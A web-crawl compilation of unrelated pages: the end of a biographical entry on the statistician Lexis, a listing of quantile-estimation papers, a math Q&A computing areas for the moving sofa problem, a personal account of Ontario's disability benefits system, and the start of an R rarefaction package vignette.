Lexis' coefficient foreshadowed the statistics of K. Pearson (q.v.) and R. A. Fisher (q.v.), in particular $\chi^2$ and the analysis of variance. However, it suffered from certain weaknesses which his more mathematical and younger contemporaries did not fail to point out and attempt to correct, among them Chuprov (q.v.), Markov (q.v.) and Bortkiewicz. In publications up to the period between the two World Wars, the Continental School of mathematical statistics tended to follow the dispersion theory of Lexis, but it eventually gave way to the Anglo-Saxon developments in this area. Lexis' statistical views, however, did not disappear from view, as they had the dubious distinction of being singled out for attack, on account of their reactionary and bourgeois nature, within the Soviet Union by guardians of ideology such as Yastremsky.

#### References

[1] Bauer, R. (1955). Die Lexissche Dispersionstheorie in ihren Beziehungen zur modernen statistischen Methodenlehre, insbesondere zur Streuungsanalyse (Analysis of Variance). Mitteilungsblatt für mathematische Statistik und ihre Anwendungsgebiete, 7, 25-45.

[2] Bortkiewicz, L. von (1915). Wilhelm Lexis. Bulletin de l'Institut International de Statistique, Tome 20, 1ère livraison, pp. 328-332.

[3] Bortkiewicz, L. von (1904). Die Theorie der Bevölkerungs- und Moralstatistik nach Lexis. Jahrbücher für Nationalökonomie und Statistik, III. Folge, Bd. 27, pp. 230-254.

[4] Heiss, K.-P. (1968). Lexis, Wilhelm. International Encyclopedia of the Social Sciences, 9, 271-276. Macmillan and the Free Press, New York.

[5] Heyde, C. C. & Seneta, E. (1977). I. J. Bienaymé: Statistical Theory Anticipated. Springer, New York, pp. 49-58.

[6] Stigler, S. M. (1986). The History of Statistics: The Measurement of Uncertainty Before 1900. Belknap Press, Harvard, pp. 221-238.

Reprinted with permission from Christopher Charles Heyde and Eugene William Seneta (Editors), Statisticians of the Centuries, Springer-Verlag Inc., New York, USA.
2021-04-19 15:30:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.43578511476516724, "perplexity": 3908.4358736579125}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038887646.69/warc/CC-MAIN-20210419142428-20210419172428-00593.warc.gz"}
https://paperswithcode.com/task/sequential-quantile-estimation
# Sequential Quantile Estimation

2 papers with code.

# Computing Extremely Accurate Quantiles Using t-Digests (11 Feb 2019)

We present on-line algorithms for computing approximations of rank-based statistics that give high accuracy, particularly near the tails of a distribution, with very small sketches.

# Sequential Quantiles via Hermite Series Density Estimation (17 Jul 2015)

These algorithms go beyond existing sequential quantile estimation algorithms in that they allow arbitrary quantiles (as opposed to pre-specified quantiles) to be estimated at any point in time.
https://mathzsolution.com/modelling-the-moving-sofa/
# Modelling the "Moving Sofa"

I believe that many of you know about the moving sofa problem; if not, you can find the description of the problem here. In this question I am going to rotate the L-shaped hall instead of moving a sofa around the corner. By rotating the hall $180^{\circ}$, what remains between the walls will give the shape of the sofa. Like this:

The points on the hall have the following properties:

\begin{eqnarray}
A & = & \left( r\cos\alpha,\ t\sin\alpha \right) \\
A' & = & \left( r\cos\alpha + \sqrt{2}\cos\left(\frac{\pi}{4}+\frac{\alpha}{2}\right),\ t\sin\alpha + \sqrt{2}\sin\left(\frac{\pi}{4}+\frac{\alpha}{2}\right) \right) \\
B & = & \left( r\cos\alpha - \frac{t\sin\alpha}{\tan\left(\frac{\alpha}{2}\right)},\ 0 \right) \\
B' & = & \left( r\cos\alpha - \frac{t\sin\alpha}{\tan\left(\frac{\alpha}{2}\right)} - \frac{1}{\sin\left(\frac{\alpha}{2}\right)},\ 0 \right) \\
C & = & \left( r\cos\alpha + t\sin\alpha\tan\left(\frac{\alpha}{2}\right),\ 0 \right) \\
C' & = & \left( r\cos\alpha + t\sin\alpha\tan\left(\frac{\alpha}{2}\right) + \frac{1}{\cos\left(\frac{\alpha}{2}\right)},\ 0 \right)
\end{eqnarray}

Attention: $\alpha$ is not the angle $AOC$; it is some angle $ADC$ where $D$ changes location on the $x$-axis for $r\neq t$. I am saying this because the images can create confusion. Anyway, I will change them as soon as possible.

I could consider $r=f(\alpha)$ and $t=g(\alpha)$, but for this question I am going to take $r$ and $t$ as constants. If they were functions of $\alpha$, some interesting shapes would appear. I experimented with different functions; however, the areas are more difficult to calculate, which is why I am not going to share them here. Maybe in the future.

We rotate the hall for $r=t$ in the example above. In this case:

1. point $A$ moves on a semicircle;
2. the envelope of lines between $A'$ and $C'$ is a circular arc. One has to prove this, but I assume that it is true for $r=t$.

If my second assumption is correct, the area of the sofa is $A = 2r-\frac{\pi r^{2}}{2}+\frac{\pi}{2}$. The maximum area is reached when $r = 2/\pi$ (setting $dA/dr = 2-\pi r = 0$), and its value is:

$$A = 2/\pi+\pi/2 = 2.207416099$$

which matches Hammersley's sofa. The shape is also similar or the same:

Now I am going to increase $t$ with respect to $r$. For $r=2/\pi$ and $t=0.77$:

Well, this looks like Gerver's sofa. I believe the area can be maximized by finding the equations of the envelopes above and below the sofa. Look at this question where @Aretino has computed the area below $ABC$. I don't know enough to find equations for envelopes; I am afraid that I will make mistakes. I considered calculating the area by counting the number of pixels in it, but this is not a good idea because, to optimize the area, I would have to create many images.

I will give a bounty of 200 to whoever calculates the maximum area. As I said, the most difficult part of the problem is to find the equations of the envelopes. @Aretino did it.

PLUS: Could the following be the longest sofa, where $(r,t)=((\sqrt 5+1)/2,1)$?

If you want to investigate further or use the animation for educational purposes, here is the Geogebra file: http://ggbm.at/vemEtGyj

Ok, I had some free time, I counted the number of pixels in the sofa, and I am sure that I have something bigger than Hammersley's constant.
First, I made a simulation for Hammersley's sofa where $r=t=2/\pi$, exported the image to png at 300 dpi (6484×3342 pixels) and, using Gimp, counted the number of pixels which have exactly the same value. For Hammersley I got $3039086$ pixels. For the second case, $r=0.59$ and $t=0.66$, I got $3052780$ pixels. To calculate the area for this case:

$$\frac{3052780}{3039086}(2/\pi + \pi/2)=2.217362628$$

which is slightly less than Gerver's constant, $2.2195$. Here is the sofa:

WARNING: this answer uses the new parameterization of points introduced by the OP:

$$\begin{eqnarray} A & = & \left( r\cos\alpha,\ t\sin\alpha \right) \\ A' & = & \left( r\cos\alpha + \sqrt{2}\cos\left(\frac{\pi}{4}+\frac{\alpha}{2}\right),\ t\sin\alpha + \sqrt{2}\sin\left(\frac{\pi}{4}+\frac{\alpha}{2}\right) \right) \\ C & = & \left( r\cos\alpha + t\sin\alpha\tan\left(\frac{\alpha}{2}\right),\ 0 \right) \\ C' & = & \left( r\cos\alpha + t\sin\alpha\tan\left(\frac{\alpha}{2}\right) + \frac{1}{\cos\left(\frac{\alpha}{2}\right)},\ 0 \right) \end{eqnarray}$$

Another parameterization, which also appeared in a first version of this question, was used in a previous answer to a related question.

The inner shape of the sofa is formed by the ellipse of semiaxes $r$, $t$ and by the envelope of lines $AC$ (here and in the following I'll consider only that part of the sofa in the $x\ge0$ half-plane). The equations of lines $AC$ can be expressed as a function of $\alpha$ ($0\le\alpha\le\pi$) as $F(x,y,\alpha)=0$, where:

$$F(x,y,\alpha)= -t y \sin\alpha \tan{\alpha\over2} - t \sin\alpha \left(x - r \cos\alpha - t \sin\alpha \tan{\alpha\over2}\right).$$

The equation of the envelope can be found from:

$$F(x,y,\alpha)={\partial\over\partial\alpha}F(x,y,\alpha)=0,$$

giving the parametric equations for the envelope:

\begin{align} x_{inner}=& (r-t) \cos\alpha+\frac{1}{2}(t-r) \cos2\alpha+\frac{1}{2}(r+t),\\ y_{inner}=& 4 (t-r) \sin\frac{\alpha}{2}\, \cos^3\frac{\alpha}{2}.\\ \end{align}

We need not consider this envelope if $t<r$, because in that case $y_{inner}<0$.
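The envelope computation is mechanical enough to check with a computer algebra system. The following is a verification sketch (not from the original answer), assuming SymPy; since $F$ and $\partial F/\partial\alpha$ are linear in $x$ and $y$, solving the two equations recovers the parametric form quoted above:

```python
# Verify the inner-envelope parametrization by solving
# F = 0 and dF/dalpha = 0 for x and y with SymPy.
import sympy as sp

x, y, al, r, t = sp.symbols('x y alpha r t', positive=True)
F = -t*y*sp.sin(al)*sp.tan(al/2) \
    - t*sp.sin(al)*(x - r*sp.cos(al) - t*sp.sin(al)*sp.tan(al/2))
sol = sp.solve([F, sp.diff(F, al)], [x, y], dict=True)[0]
print(sp.simplify(sol[x]))  # expect (r-t)cos(a) + (t-r)cos(2a)/2 + (r+t)/2
print(sp.simplify(sol[y]))  # expect 4(t-r) sin(a/2) cos(a/2)^3
```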
If $t>r$, the envelope meets the ellipse at a point $P$: the corresponding value of $\alpha$ can be found from the equation $(x_{inner}/r)^2+(y_{inner}/t)^2=1$, whose solution $\alpha=\bar\alpha$ is given by:

$$\begin{cases} \displaystyle\bar\alpha= 2\arccos\sqrt{t\over{t+r}}, &\text{for } t\le3r;\\ \displaystyle\bar\alpha= \arccos\sqrt{t\over{2(t-r)}}, &\text{for } t\ge3r.\\ \end{cases}$$

The corresponding values $\bar\theta$ of the parameter of the ellipse can be easily computed from $\bar\theta=\arcsin(y_{inner}(\bar\alpha)/t)$:

$$\begin{cases} \displaystyle\bar\theta= \arcsin\frac{4 \sqrt{rt} (t-r)}{(r+t)^2}, &\text{for } t\le3r;\\ \displaystyle\bar\theta= \arcsin\frac{\sqrt{t(t-2 r)}}{t-r}, &\text{for } t\ge3r.\\ \end{cases}$$

For $t\ge r$ we can then represent half the area under the inner shape of the sofa as an integral:

$${1\over2}Area_{inner}=\int_0^{2t-r} y\,dx= \int_{\pi/2}^{\bar\theta}t\sin\theta\,{d\over d\theta}(r\cos\theta)\,d\theta+ \int_{\bar\alpha}^{\pi} y_{inner}\,{dx_{inner}\over d\alpha}\,d\alpha.$$

This can be computed explicitly; here is, for instance, the result for $r<t\le3r$:

\begin{align} {1\over2}Area_{inner}= {\pi\over4}(r^2-rt+t^2) +\frac{1}{48} (t-r)^2 \Big[-24 \cos^{-1}\frac{\sqrt{t}}{\sqrt{r+t}} +12 \sin \left(2 \cos^{-1}\frac{\sqrt{t}}{\sqrt{r+t}}\right)\\ +12 \sin \left(4 \cos^{-1}\frac{\sqrt{t}}{\sqrt{r+t}}\right) -4 \sin \left(6 \cos^{-1}\frac{\sqrt{t}}{\sqrt{r+t}}\right) -3 \sin \left(8 \cos^{-1}\frac{\sqrt{t}}{\sqrt{r+t}}\right) \Big]\\ -2 r t {\sqrt{rt}\, |r^2-6 r t+t^2|\over(r+t)^4} -{1\over4} r t \sin^{-1}\frac{4 \sqrt{rt} (t-r)}{(r+t)^2} \end{align}

The outer shape of the sofa is formed by the line $y=1$ and by the envelope of lines $A'C'$. By repeating the same steps as above, one can find the parametric equations of the outer envelope:

\begin{align} x_{outer}&= (r-t) \left(\cos\alpha-{1\over2}\cos2\alpha\right) +\cos\frac{\alpha}{2}+{1\over2}(r+t)\\ y_{outer}&= \sin\frac{\alpha}{2} \left(-3 (r-t) \cos\frac{\alpha}{2} +(t-r) \cos\frac{3 \alpha}{2}+1\right)\\ \end{align}

This curve meets the line $y=1$ at $\alpha=\pi$ if $t-r\le\bar x$, where $\bar x=\frac{1}{432} \left(17 \sqrt{26 \left(11-\sqrt{13}\right)}-29 \sqrt{2 \left(11-\sqrt{13}\right)}\right)\approx 0.287482$. In that case the intersection point has coordinates $(2t-r,1)$, and the area under the outer shape of the sofa can be readily found:

$${1\over2}Area_{outer}={1\over3}(r+2t)+{\pi\over4}(1-(t-r)^2)$$

If, on the other hand, $t-r>\bar x$, then one must find the value of the parameter $\alpha$ at which the envelope meets the line, by solving the equation $y_{outer}=1$ and looking for the smallest positive solution. This has to be done, in general, by some numerical method.

The area of the sofa can then be found as $Area_{tot}=Area_{outer}-Area_{inner}$. I used Mathematica to draw a contour plot of this area, as a function of $r$ (horizontal axis) and $t$ (vertical axis):

There is a clear maximum in the region around $r = 0.6$ and $t = 0.7$. In this region one can use the simple expressions for $Area_{inner}$ and $Area_{outer}$ given above to find the exact value of the maximum. A numerical search gives $2.217856997942074266$ for the maximum area, reached for $r=0.605513519698965$ and $t=0.6678342468712839$.
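As a numerical sanity check (an addition, not part of the original answer), the half-area integrals above can be evaluated directly at the reported optimum. The sketch assumes SciPy and uses the $t\le 3r$ and $t-r<\bar x$ branches, both of which hold at that point:

```python
# Evaluate Area_tot = Area_outer - Area_inner at the reported optimum.
import numpy as np
from scipy.integrate import quad

r, t = 0.605513519698965, 0.6678342468712839

# inner and outer envelopes and their x-derivatives (t > r here)
x_in   = lambda a: (r-t)*np.cos(a) + 0.5*(t-r)*np.cos(2*a) + 0.5*(r+t)
y_in   = lambda a: 4*(t-r)*np.sin(a/2)*np.cos(a/2)**3
dx_in  = lambda a: (t-r)*(np.sin(a) - np.sin(2*a))
y_out  = lambda a: np.sin(a/2)*(-3*(r-t)*np.cos(a/2) + (t-r)*np.cos(1.5*a) + 1)
dx_out = lambda a: (r-t)*(-np.sin(a) + np.sin(2*a)) - 0.5*np.sin(a/2)

abar  = 2*np.arccos(np.sqrt(t/(t+r)))   # t <= 3r branch for alpha-bar
thbar = np.arcsin(y_in(abar)/t)         # matching ellipse parameter

half_inner = quad(lambda th: -r*t*np.sin(th)**2, np.pi/2, thbar)[0] \
           + quad(lambda a: y_in(a)*dx_in(a), abar, np.pi)[0]
# t - r < xbar ~ 0.2875, so the outer envelope meets y = 1 at alpha = pi,
# at the point (2t - r, 1); the strip under y = 1 contributes 2t - r.
half_outer = (2*t - r) + quad(lambda a: y_out(a)*dx_out(a), np.pi, 0)[0]

print(2*(half_outer - half_inner))      # expect about 2.217857
```

Setting $r=t$ in the same machinery reproduces the Hammersley value $2r+\pi/2-\pi r^2/2$ from the question, which is a useful cross-check of the signs and limits.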
https://esdc-consultations.canada.ca/canadian-poverty-reduction-strategy-stories/stories/it-could-happen-to-you-it-did-happen-to-me
# It could happen to you - It did happen to me

by GWAILIN

I am a 48-year-old single male Canadian taxpayer with no dependants, residing in Toronto, and was diagnosed with a chronic health condition in 2015. I come from a financially modest background and I have no family in Ontario. My only family, my mother and brother, live in NS, from where I immigrated to Toronto in 1990 in search of employment and opportunity. I have lived in the GTA Toronto-Danforth riding cumulatively for over 15 years. I love my home, which I rent, and particularly the area and community in which I live. My doctor, pharmacist, bank and other amenities are all within several blocks.

I had a life-changing event. I was diagnosed with progressive polyneuropathy and somatic pain syndrome in the summer of 2015 after a long, slow progression of the condition. This condition in my case causes, among other symptoms, constant severe widespread pain throughout my body, an ataxic gait and mobility issues. As a result, I now live with a disability and walk with a cane. My condition will not get better; in fact, it has gotten and will continue to get worse. It is a progressive, degenerative condition of the nervous system.

I started the application process for ODSP (Ontario Disability Support Program) near the end of 2015. I was told I had 'too much money' to qualify for support, due to some very modest investments I had made in good faith and with the best intentions some time ago while doing 'the right thing' and planning for the future.

I first started experiencing symptoms of my condition in 2011. At the end of 2012, due to my worsening symptoms, I had to make the very difficult decision to walk away from a senior management position in a well-established career in the market research industry spanning over two decades, along with a very respectable salary. I had only been employed by my most recent employer for a relatively short period of time, and therefore did not qualify for LTD through workplace insurance. My previous employer I was with for over 16 years; had I not made the fateful choice to leave there to pursue another opportunity, I would have been covered by the previous employer's workplace insurance.

After leaving work, I spent the subsequent 2 years seeking a diagnosis; seeing multiple specialists and technologists, undergoing multiple tests, etc., and was not getting any clear answers. Many doctors were baffled as to the root cause of my symptoms. Fast forward to July 2015, when my condition eventually worsened to the point that I called 911 myself. I could barely walk or take care of myself, was in considerable pain/discomfort, under-nourished and severely dehydrated. Frankly, I thought I was going through renal failure or some other fatal event. On my second visit to emergency, I was finally admitted to hospital, where I stayed for ~6 weeks and underwent extensive tests (spinal tap, nerve biopsy, MRIs, ECGs, EMGs, extensive blood work, etc.), and finally received the aforementioned diagnosis. I was then transferred to a rehab facility where I spent another 3.5 weeks undergoing physiotherapy, etc. Having been blessed with relatively good health my entire life up until that point, it was quite an eye-opener indeed to see the cracks, flaws and strains first-hand within our underfunded public health care system, but that's another issue altogether.

After leaving work at the beginning of 2013, I lived off my own life savings; ~$100K in savings and investments, with no outside financial assistance.
Once my life savings were all but gone (along with my dream of ever being a homeowner), I was in need of financial assistance. I was later horrified being introduced to what I discovered to be a very broken and antiquated system known as the Ontario Disability Support Program (Act, 1997). I was told that I didn't qualify for assistance because I still had 'too much money'. After watching my entire hard-earned life savings all but disappear, I had remaining two modest investments: an RRSP worth ~$XXXX and a non-refundable GIC worth ~$XXXX which was to mature in Aug 2017. I was an open book to ODSP in terms of my financial records and medical history. Aside from those two small investments, I had ~$8K in savings, and shrinking. This is all the money that I had left in the world in order to keep my home, which I happen to rent (and for which I paid out of my own pocket to have safety grab bars installed in the shower), to pay utilities, buy food, etc.

In order to qualify for ODSP, I was told that one could not have more than $5K in the bank. I couldn't remember the last time I had less than $5K, and now I was being told that I wasn't allowed to have any more than $5K? Living in Toronto today, that's a mere 2-3 months away from homelessness at best! It was then that I learned that a person with a disability isn't allowed to have their own financial safety net. I was literally facing eviction and/or homelessness in a matter of months and ODSP was telling me that I had too much money?

One can own a home and a car, both obviously substantial investments/assets, and still qualify for ODSP, but renting an apartment and having more than $5K in the bank disqualifies one? How does this make sense? (Albeit anyone owning a home on ODSP likely won't remain a homeowner for very long.) I asked my ODSP intake worker and several politicians if this seemingly arbitrary limit of $5K had been adjusted since the ODSP Act was introduced in 1997. No one could answer me, because no one knew (or seemingly cared). In 1997 my rent was nearly half what it is now. Does having $5K in the bank suddenly make a person rich? I can see if maybe someone had $50K or $100K in the bank, for instance, which I once had, and spent supporting myself while seeking a diagnosis, staying optimistic and thinking I was going to get better. I have since learned and accepted that I am not going to get better, and have been told that my condition, if it changes, will only worsen. My life is now forever changed for the worse. I was (and still am) trying to hang onto a shred of what I once had, and I was being told I had 'too much money'. What I had/have is relatively a mere pittance. Meanwhile there are constant, almost daily reports in the media about government waste and fiscal/financial mismanagement. 'Too much money' indeed.

In order to qualify for the ODSP, I had to liquidate my modest investments so that I could transfer them into an RDSP (Registered Disability Savings Plan), which I had just learned about and was told that now this was 'the right thing to do'. ODSP does not consider funds in an RDSP as part of their qualification process, and once funds are contributed to an RDSP, they are locked in for a minimum of 10 years.

- In order to liquidate my GIC before maturity, I had to forfeit the interest that had accrued; several hundred dollars.
- In order to transfer my RRSP into an RDSP, that too first had to be liquidated, incurring a 20% withholding tax. Why an RRSP can't be seamlessly transferred into an RDSP is beyond me.
Ergo, it cost me well over a thousand dollars in lost interest and tax withholdings to qualify for ODSP, which does not provide adequate money to live on. ODSP only provides me with ~$1400 per month (including special diet and medical travel allowances), about a quarter of what I once earned. My rent alone is $965, not including hydro, phone, internet, food, etc. Why can't one have a modest financial safety net and still qualify, so that one can 'bridge the gap' between ODSP and the real world, and potentially stay in one's home for a year or so longer than one would otherwise? Is this the spirit in which the ODSP Act was intended? To deny benefits to someone with a disability because they have a few thousand dollars invested?

Trying to obtain affordable/subsidized housing in Toronto is, from my experience, a joke. I applied to 'Housing Connections', which maintains the centralized waiting list for subsidized housing in Ontario. I've never dealt with a less transparent, apathetic bureaucracy in my life. When I called to check on the status of my application, I was basically told 'don't call us, we'll call you' and that, as a single male with no dependents, I'll be waiting at least 10 years regardless. If/when I lose my apartment, I'll be on the street and will be even more of a burden on the system. From my understanding, the city issues 'portable' housing allowances from time to time, as funding permits, which can provide between $200 and $500 per month towards one's rent. However, from my experience they are discretionarily targeted towards specific demographics; the last two issued, which I found out about via a third party, were targeted towards mothers leaving domestic abuse and seniors, respectively. Single males with a disability and no dependents are always at the bottom of the list.

I couldn't and still can't help but feel as though I'm being penalized for trying to do the right things in life, work hard and save for the future. Meanwhile, if I had done everything wrong in life, was bankrupt and carried massive debt, then I would more easily have qualified for ODSP. It doesn't matter that I worked hard my entire life and tried to do the right things; I'm being treated exactly the same way, regardless of my work history and the years I have paid into the system.

Many people share the same view that ODSP is a broken, antiquated system. In conversations I've had with healthcare professionals, bank managers, CRA agents, PSWs, social workers, lawyers, family, friends, strangers, even ODSP agents themselves, they all express and agree how unfair, archaic and draconian the system currently is. I once said that I fear homelessness/poverty more than I fear death; now I fear I'm staring all three straight down the barrel. I had read in old legislative transcripts that, when the ODSP was first introduced in 1997, the intention was to make a clear distinction between persons with disabilities and those on regular welfare. That intention and distinction has clearly long ago fallen by the wayside. When speaking with representatives from some of the various agencies that I've come in contact with, clearly many of them have not made that distinction either. Coming from the corporate world and professional environments, I approached each agent or representative as if they were my peer. It didn't take very long at all to realize that that sentiment is far from being reciprocated.
Regardless of one's background or approach, you're talked down to, treated as a second-class citizen and/or some sort of pariah trying to scam the system.

In short, I once had a well-established career along with a very respectable salary, which I was forced to leave in 2012 due to the onset of a chronic degenerative neuromuscular condition. As I had recently started a new position at a new organization, I was not eligible for workplace insurance and 'fell through the cracks'. After supporting myself for 3+ years on my own steadily depleting assets, and an extended hospital stay in 2015, I turned to the ODSP and our 'social safety net' for help. I was horrified to learn of the profoundly unpalatable options that were presented to me, but as a single person with no dependents and no family to fall back on, I had nowhere else to turn. I felt completely stripped of my dignity and self-worth as I navigated the many punitive and draconian rules and regulations in order to be assimilated into a system that would not provide me with enough money to survive on. I now live in abject poverty as I count down the months and days leading to my inevitable eviction and homelessness, which will happen long before my name comes up on the centralized waiting list for decent subsidized/affordable housing. Frankly (and sadly), I feel as though I'd have a shorter wait on the waiting list for doctor-assisted suicide. That may not be a 'politically correct' thing to say, but that's how I feel. The writing is on the wall for me, and my disability is not going away, as it is for countless others in similar situations, unless something is done NOW to break this cycle of poverty.

Consultation has concluded. 1 comment, over 4 years ago:

> sorry hard to feel sympathy no offence but compared to most of us here you are wealthy. best of luck - what you learned is what we have known for many years
http://cran.wustl.edu/web/packages/Rarefy/vignettes/Rarefy_basics.html
# A quick introduction to rarefaction analysis using Rarefy

#### 2021-03-11

```r
# Required packages
require(Rarefy)
require(ape)
require(vegan)
require(phyloregion)
require(raster)
```

## Introduction

Rarefy is an R package including a set of new functions able to cope with any diversity metric and to calculate expected values of a given taxonomic, functional or phylogenetic index for a reduced sampling size under a spatially-constrained and distance-based ordering of the sampling units. Rarefy and the functions therein represent an ultimate solution for ecologists to rarefy any diversity metric by taking into account the contribution of any distance-based ordination of sampling units, providing more ecologically meaningful (unbiased) estimates of the expected diversities.

This vignette aims at describing some applications of the Rarefy package, helping the user to calculate different types of spatially and non-spatially explicit rarefaction curves. The vignette is organized in the following sections, exploring different package features and applications:

1. Diversity indices and datasets available in Rarefy;
2. Spatially-explicit rarefaction;
3. Rarefaction of alpha diversity indices;
4. Rarefaction of beta diversity;
5. Phylogenetic spatially-explicit rarefaction;
6. Null models in rarefaction practice.

## 1. Diversity indices and datasets available in Rarefy

Rarefy offers the possibility to calculate a large set of diversity indices, and new metrics will be implemented in future package updates. The indices available for each function implemented in Rarefy are detailed below.

**rare_alpha**

- *HCDT entropy* (Havrda & Charvát 1967; Daróczy 1970; Tsallis 1988):
  $$HCDT=\frac{1-\sum_{i=1}^{n}p_i^q}{q-1}$$
  A generalization of the standard coefficient of entropy. $q$ is the parameter that regulates the sensitivity to species abundance and $p_i$ is the relative abundance of species $i$. For $q=0$, the index is equal to species richness minus one; for $q$ tending to 1, it is equivalent to Shannon entropy; and for $q=2$ it is equivalent to the Gini-Simpson index.
- *Hill numbers* (Hill 1973):
  $$^{q}D=\left( \sum_{i=1}^{S}p_i^q\right )^{1/(1-q)}$$
  A class of measures that obeys the replication principle and integrates species richness and species abundances. The parameter $q$, called 'order', regulates the sensitivity of the index to species abundance: with $q=0$ the value of the index corresponds to species richness, with $q$ tending to 1 the measure tends to the exponential of the Shannon index, and with $q=2$ it corresponds to the inverse of the Simpson index. $p_i$ is the relative abundance of species $i$.

**rare_beta**

- *Bray-Curtis dissimilarity* (Bray & Curtis 1957):
  $$\beta_{bray}=\frac{\sum_{i}(x_i-x_j)}{\sum_{i}(x_i+x_j)}$$
  A pairwise measure of similarity between plots weighted by the abundances of the species. The accumulation curve is calculated with the mean of pairwise dissimilarities among $N$ plots. $x_i$ and $x_j$ are the abundances of species $x$ in plots $i$ and $j$.
- *Cody index* (Cody 1975):
  $$\beta_c=\frac{g(H)+l(H)}{2}$$
  Defined as the rate at which species are replaced in censuses at each point on the habitat gradient, for samples arranged along gradients of environmental change.
  $g(H)$ is the number of species gained along the habitat gradient $H$ and $l(H)$ is the number of species lost.
- *Jaccard dissimilarity coefficient* (Jaccard 1901, 1912):
  $$\beta_j=\frac{a}{\alpha_1+\alpha_2-a}$$
  A pairwise measure of dissimilarity between plots. The accumulation curve is calculated with the mean of pairwise dissimilarities among $N$ plots. $a$ is the number of species in common between two plots, and $\alpha_1$ and $\alpha_2$ are the values of alpha diversity (species richness) of the two plots compared.
- *Whittaker's species turnover* (Whittaker 1960, 1972):
  $$\beta_w=\frac{\gamma}{\alpha}-1$$
  Calculates how many times there is a change in species composition among the plots. $\gamma$ is the species richness over all plots compared and $\alpha$ the average species richness within a single plot.

**rare_phylo / ser_phylo**

- *Barker's weighted phylogenetic diversity* (Barker 2002):
  $$PD_w=B\times\frac{\sum_{i}^{B}L_iA_i}{\sum_{i}^{B}A_i}$$
  The abundance-weighted Faith's $PD$: the number of branches is multiplied by the weighted mean branch length, with weights equal to the average abundance of species sharing that branch. $L_i$ is the branch length of branch $i$, $A_i$ is the average abundance of the species sharing branch $i$, and $B$ is the number of branches in the tree.
- *Faith's phylogenetic diversity* (Faith 1992):
  $$PD=\sum_{i\in B} L_i$$
  The sum of branch lengths in a phylogenetic tree for the assemblage of species. $L_i$ is the branch length of branch $i$ and $B$ is the number of branches in the tree.
- *Feature diversity indices* (Pavoine & Ricotta 2019):
  $$^qƒdiv_{Hill}=\left[\sum_{i \in B} L_{i}(p_{i})^{q}\right]^{\frac{1}{1-q}},\qquad {}^qƒdiv_{HCDT}= \frac{1-\sum_{i \in B} L_{i}(p_{i})^q}{q-1},\qquad {}^qƒdiv_{Renyi}= \frac{1}{1-q}\log\left[ \sum_{i \in B} L_{i}(p_{i})^q\right]$$
  Hill numbers and the HCDT and Rényi entropies adapted for the calculation of phylogenetic diversity, replacing the species with the units of branch length in the phylogenetic tree. $L_i$ is the branch length of branch $i$, $p_i$ is the relative abundance of the species sharing branch $i$, and $q$ is the scaling constant that weights the importance of the rarity of species. $B$ is the number of branches in the tree.
- *Pavoine's index* (Pavoine et al. 2009):
  $$I_a=\sum_{K=1}^{N}\left(t_K-t_{K-1}\right)H_{a,K}$$
  Calculates phylogenetic diversity partitioned between evolutionary periods and between plots defined in terms of spatial and time units. Tsallis or HCDT entropy (Havrda & Charvát 1967; Daróczy 1970; Tsallis 1988), which measures diversity by regrouping individuals into categories, is computed for each period of the phylogenetic tree, from the number of lineages that descend from the period and from the relative abundances summed within these lineages within the focal community. With $a=0$, HCDT is richness (number of species) minus one and $I_a$ is Faith's $PD$ minus the height of the phylogenetic tree; with $a$ tending to 1, HCDT is a generalization of the Shannon index; while with $a=2$, HCDT is the Simpson index and $I_a$ is Rao's QE applied to phylogenetic distances between species. To apply $I_a$, the phylogeny must be ultrametric.
  $H_{a,K}$ is the HCDT entropy of order $a$ applied to period $K$, and $t_K-t_{K-1}$ is the length of period $K$.

**ser_functional**

- *Chao's functional beta-diversity index* (Chao et al. 2019):
  $$^{q}FD(\Delta(\tau))=\left( \sum_{i=1}^{S} \nu_{i}(\tau)\left(\frac{a_i(\tau)}{n_{+}} \right)^{q} \right)^{1/(1-q)}$$
  Quantifies the effective number of equally-distinct functional groups in the considered plots at the distinctiveness threshold $\tau$. Any two species with functional distance greater than or equal to $\tau$ are treated as functionally equally-distinct and as belonging to different functional groups with distance $\tau$. For each pair of species with functional distance lower than $\tau$ but different from zero, only a proportion of individuals is considered functionally equally-distinct; the other proportion of individuals is considered functionally indistinct. If the pairwise distance is equal to zero, the two species are treated as belonging to the same functional group. After dividing the set of species to form functionally indistinct groups, the contribution of every species is quantified and then the $FD$ of order $q$ is calculated using the Hill number of order $q$. $a_{i}(\tau)$ is the combined abundance of all functionally-indistinct individuals from species $i$, $v_{i}(\tau)=n_{i}/a_{i}(\tau)$ represents the attribute contribution of species $i$ for a threshold level $\tau$ ($n_{i}$ is the abundance of species $i$), $n_+$ is the total number of individuals in the community, and $q$ is the parameter that determines the sensitivity of the measure to the relative abundance of the species.
- *Rao's quadratic entropy* (Rao 1982):
  $$Q\left(p,\mathbf{D}\right)=\sum_{k=1}^{S}\sum_{l=1}^{S}p_{k}p_{l}d_{kl}$$
  Incorporates both the relative abundances of species and a measure of the pairwise functional distances between species. It expresses the average difference between two randomly selected individuals with replacement. $p=(p_1,...,p_k,...,p_S)$ is the vector of relative abundances of species, $S$ is the number of species, $\mathbf{D}=(d_{kl})$ is the matrix of functional dissimilarities among species, and $d_{kl}$ is the functional dissimilarity between species $k$ and $l$.

## 2. Spatially-explicit rarefaction

Here we provide a classic example of the calculation of a taxonomic spatially-explicit rarefaction curve using the duneFVG data included in Rarefy, as described for the first time by Chiarucci et al. (2009). The datasets are loaded as follows:

```r
data("duneFVG")    # plot/species matrix
data("duneFVG.xy") # plot geographic coordinates
```

Firstly, a pairwise Euclidean distance matrix between sampling units is calculated using the sampling unit coordinates:

```r
dist_sp <- dist(duneFVG.xy$tot.xy)
```

